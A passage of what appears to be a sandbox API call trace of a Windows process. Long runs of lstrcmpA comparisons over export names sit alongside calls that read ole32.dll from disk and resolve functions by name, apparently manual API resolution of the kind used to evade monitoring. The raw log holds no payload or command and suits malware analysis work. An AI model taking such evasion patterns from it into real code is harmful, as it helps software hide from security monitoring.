lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0140.099] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessAllowedAce") returned 1 [0140.099] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessAllowedAceEx") returned 1 [0140.099] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessAllowedObjectAce") returned 1 [0140.099] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessDeniedAce") returned 1 [0140.099] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessDeniedAceEx") returned 1 [0140.100] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessDeniedObjectAce") returned 0 [0140.100] lstrcmpA (lpString1="AddAce", lpString2="A_SHAFinal") returned 1 [0140.100] lstrcmpA (lpString1="AddAce", lpString2="A_SHAInit") returned 1 [0140.373] GetProcessHeap () returned 0x520000 [0140.374] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2d62010 | out: hHeap=0x520000) returned 1 [0140.379] GetProcessHeap () returned 0x520000 [0140.379] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x539980 [0140.380] LoadLibraryA (lpLibFileName="Ole32.dll") returned 0x7ffc5e3e0000 [0140.380] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0140.380] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0140.380] GetModuleFileNameA (in: hModule=0x7ffc5e3e0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")) returned 0x1d [0140.380] CreateFileA (lpFileName="C:\\Windows\\system32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0140.381] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0140.381] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0140.381] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=1322240) returned 1 [0140.381] GetProcessHeap () returned 0x520000 [0140.381] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x142d00) returned 0x4123040 [0140.384] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0140.384] ReadFile (in: hFile=0x140, lpBuffer=0x4123040, nNumberOfBytesToRead=0x142d00, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x4123040*, lpNumberOfBytesRead=0x14f5a4*=0x142d00, lpOverlapped=0x0) returned 1 [0140.764] CloseHandle (hObject=0x140) returned 1 [0140.764] lstrcmpA (lpString1="BindMoniker", lpString2="BindMoniker") returned 0 [0140.764] lstrcmpA (lpString1="CLIPFORMAT_UserFreeExt", lpString2="BindMoniker") returned 1 [0140.764] lstrcmpA (lpString1="CLIPFORMAT_UserFreeExt", lpString2="CLIPFORMAT_UserFree") returned 1 [0140.764] lstrcmpA (lpString1="CLIPFORMAT_UserFreeExt", lpString2="CLIPFORMAT_UserFree64") returned 1 [0140.764] lstrcmpA (lpString1="CLIPFORMAT_UserFreeExt", lpString2="CLIPFORMAT_UserFreeExt") returned 0 [0140.764] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="BindMoniker") returned 1 [0140.764] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserFree") returned 1 [0140.764] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserFree64") returned 1 [0140.764] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0140.764] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0140.764] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0140.764] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserMarshalExt") returned 0 [0140.764] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="BindMoniker") returned 1 [0140.764] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserFree") returned 1 [0140.764] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserFree64") returned 1 [0140.765] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0140.765] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0140.765] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0140.765] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0140.765] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserSize") returned 1 [0140.765] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserSize64") returned 1 [0140.765] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserSizeExt") returned 0 [0140.765] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="BindMoniker") returned 1 [0140.765] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserFree") returned 1 [0140.765] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserFree64") returned 1 [0140.765] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0140.765] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0140.765] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0140.765] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0140.765] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserSize") returned 1 [0140.765] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserSize64") returned 1 [0140.765] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0140.765] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0140.765] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0140.765] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 0 [0140.773] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="BindMoniker") returned 1 [0140.773] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserFree") returned 1 [0140.773] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserFree64") returned 1 [0140.773] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0140.773] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0140.773] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0140.773] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0140.773] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserSize") returned 1 [0140.773] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserSize64") returned 1 [0140.773] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0140.773] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0140.773] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0140.773] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 1 [0140.774] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLSIDFromOle1Class") returned 1 [0140.774] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLSIDFromProgID") returned 1 [0140.774] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLSIDFromProgIDEx") returned 0 [0140.774] lstrcmpA (lpString1="CheckInitDde", lpString2="BindMoniker") returned 1 [0140.774] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserFree") returned -1 [0140.774] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserFree64") returned -1 [0140.774] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserFreeExt") returned -1 [0140.774] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserMarshal") returned -1 [0140.774] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserMarshal64") returned -1 [0140.774] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserMarshalExt") returned -1 [0140.774] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserSize") returned -1 [0140.774] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserSize64") returned -1 [0140.774] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserSizeExt") returned -1 [0140.774] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserUnmarshal") returned -1 [0140.774] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserUnmarshal64") returned -1 [0140.774] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserUnmarshalExt") returned -1 [0140.774] lstrcmpA (lpString1="CheckInitDde", lpString2="CLSIDFromOle1Class") returned -1 [0140.774] lstrcmpA (lpString1="CheckInitDde", lpString2="CLSIDFromProgID") returned -1 [0140.774] lstrcmpA (lpString1="CheckInitDde", lpString2="CLSIDFromProgIDEx") returned -1 [0140.774] lstrcmpA (lpString1="CheckInitDde", lpString2="CLSIDFromString") returned -1 [0140.774] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0140.774] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0140.774] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0140.774] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0140.774] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0140.774] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0140.774] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0140.774] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0140.774] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0140.774] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdStubBuffer2_Connect") returned -1 [0140.775] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0140.775] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0140.775] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0140.775] lstrcmpA (lpString1="CheckInitDde", lpString2="CheckInitDde") returned 0 [0140.775] lstrcmpA (lpString1="CleanROTForApartment", lpString2="BindMoniker") returned 1 [0140.775] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserFree") returned -1 [0140.775] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserFree64") returned -1 [0140.775] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserFreeExt") returned -1 [0140.775] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserMarshal") returned -1 [0140.775] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserMarshal64") returned -1 [0140.775] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserMarshalExt") returned -1 [0140.775] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserSize") returned -1 [0141.216] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserSize64") returned -1 [0141.216] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserSizeExt") returned -1 [0141.216] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserUnmarshal") returned -1 [0141.216] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserUnmarshal64") returned -1 [0141.216] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserUnmarshalExt") returned -1 [0141.216] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLSIDFromOle1Class") returned -1 [0141.216] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLSIDFromProgID") returned -1 [0141.216] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLSIDFromProgIDEx") returned -1 [0141.216] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLSIDFromString") returned -1 [0141.216] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0141.216] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0141.216] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0141.216] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0141.216] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0141.216] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0141.216] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0141.216] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0141.216] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0141.216] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdStubBuffer2_Connect") returned -1 [0141.216] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0141.217] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0141.217] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0141.217] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CheckInitDde") returned 1 [0141.217] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CleanROTForApartment") returned 0 [0141.217] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="BindMoniker") returned 1 [0141.217] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserFree") returned -1 [0141.217] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserFree64") returned -1 [0141.217] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserFreeExt") returned -1 [0141.217] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserMarshal") returned -1 [0141.217] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserMarshal64") returned -1 [0141.217] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserMarshalExt") returned -1 [0141.217] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserSize") returned -1 [0141.217] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserSize64") returned -1 [0141.217] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserSizeExt") returned -1 [0141.217] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserUnmarshal") returned -1 [0141.217] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserUnmarshal64") returned -1 [0141.217] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserUnmarshalExt") returned -1 [0141.217] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLSIDFromOle1Class") returned -1 [0141.217] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLSIDFromProgID") returned -1 [0141.217] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLSIDFromProgIDEx") returned -1 [0141.217] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLSIDFromString") returned -1 [0141.217] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0141.217] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0141.217] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0141.217] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0141.217] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0141.217] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0141.217] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0141.217] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0141.217] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0141.218] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdStubBuffer2_Connect") returned -1 [0141.218] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0141.218] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0141.218] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0141.218] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CheckInitDde") returned 1 [0141.218] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CleanROTForApartment") returned 1 [0141.218] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="ClipboardProcessUninitialize") returned 0 [0141.218] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="BindMoniker") returned 1 [0141.218] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserFree") returned 1 [0141.218] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserFree64") returned 1 [0141.218] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0141.218] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0141.218] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0141.218] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0141.218] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserSize") returned 1 [0141.218] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserSize64") returned 1 [0141.218] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0141.218] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0141.218] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0141.218] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 1 [0141.218] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLSIDFromOle1Class") returned 1 [0141.218] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLSIDFromProgID") returned 1 [0141.218] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLSIDFromProgIDEx") returned 1 [0141.218] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLSIDFromString") returned 1 [0141.218] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0141.218] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0141.218] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0141.218] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0141.218] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0141.218] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0141.219] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0141.219] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0141.219] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0141.219] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdStubBuffer2_Connect") returned -1 [0141.219] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0141.219] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0141.219] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0141.219] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CheckInitDde") returned 1 [0141.219] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CleanROTForApartment") returned 1 [0141.219] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="ClipboardProcessUninitialize") returned 1 [0141.219] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CoAddRefServerProcess") returned 1 [0141.219] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CoAicGetTokenForCOM") returned 0 [0141.219] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="BindMoniker") returned 1 [0141.219] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserFree") returned 1 [0141.219] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserFree64") returned 1 [0141.219] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0141.219] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0141.219] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0141.219] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0141.219] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserSize") returned 1 [0141.219] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserSize64") returned 1 [0141.219] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0141.219] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0141.219] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0141.219] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 1 [0141.219] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLSIDFromOle1Class") returned 1 [0141.219] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLSIDFromProgID") returned 1 [0141.219] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLSIDFromProgIDEx") returned 1 [0141.219] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLSIDFromString") returned 1 [0141.219] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0141.219] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0141.220] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0141.220] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0141.220] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0141.220] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0141.220] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0141.220] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0141.220] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0141.220] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdStubBuffer2_Connect") returned -1 [0141.220] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0141.220] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0141.220] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0141.220] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CheckInitDde") returned 1 [0141.220] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CleanROTForApartment") returned 1 [0141.220] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="ClipboardProcessUninitialize") returned 1 [0141.220] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CoAddRefServerProcess") returned 1 [0141.220] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CoAicGetTokenForCOM") returned 1 [0141.220] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CoAllowSetForegroundWindow") returned 0 [0141.220] lstrcmpA (lpString1="CoBuildVersion", lpString2="BindMoniker") returned 1 [0141.220] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserFree") returned 1 [0141.220] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserFree64") returned 1 [0141.220] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0141.220] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0141.220] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0141.220] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0141.220] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserSize") returned 1 [0141.220] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserSize64") returned 1 [0141.221] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0141.221] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0141.221] lstrcmpA 